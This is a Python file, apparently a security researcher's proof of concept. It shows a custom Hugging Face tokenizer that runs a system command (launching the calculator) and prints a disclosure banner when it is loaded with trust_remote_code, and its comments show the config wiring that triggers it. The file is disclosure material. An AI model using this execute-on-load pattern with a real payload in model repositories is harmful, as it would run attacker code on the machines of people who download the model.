# File: tokenization_custom.py
# Place this file in your Hugging Face model repository.
import os

from transformers import PreTrainedTokenizerFast
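
# A minimal sketch of the wiring that makes transformers import this module,
# assuming the repository also ships a tokenizer_config.json whose auto_map
# entry points at the class below (file and class names here must match the
# repo's actual contents; the exact config shape is an assumption):
#
#   {
#     "tokenizer_class": "CustomTokenizer",
#     "auto_map": {
#       "AutoTokenizer": [null, "tokenization_custom.CustomTokenizer"]
#     }
#   }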


def note_to_users():
    # Raw string so the backslashes in the banner are not treated as escapes.
    print(r"""
 _____ _               _                                ______
/  __ \ |             | |                               |___  /
| /  \/ |__   ___  ___| | ___ __ ___   __ _ _ ____  __     / / ___ _ __ ___
| |   | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ /    / / / _ \ '__/ _ \
| \__/\ | | |  __/ (__|   <| | | | | | (_| | |   >  <   ./ /__|  __/ | | (_) |
 \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_|  /_/\_\  \_____/\___|_|  \___/
----
Message from Checkmarx Zero Research Group:
Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries: running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")


class CustomTokenizer(PreTrainedTokenizerFast):
    def __init__(self, **kwargs):
        # Proof-of-concept payload: anything placed here runs as soon as the
        # tokenizer is instantiated. Popping the Windows calculator is the
        # traditional harmless demonstration.
        os.system("calc")
        note_to_users()
        super().__init__(**kwargs)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        # Second execution point: overriding the loading hook runs code during
        # loading, before __init__ is ever reached.
        note_to_users()
        return super().from_pretrained(*args, **kwargs)
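
# A minimal sketch of the victim-side trigger, assuming the auto_map config
# above is in place; the repo id is hypothetical. The custom class (and with
# it the payload in __init__) only runs when the caller opts in to remote code:
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained(
#       "some-user/some-model",   # hypothetical repo id
#       trust_remote_code=True,   # required for Hub-hosted custom code
#   )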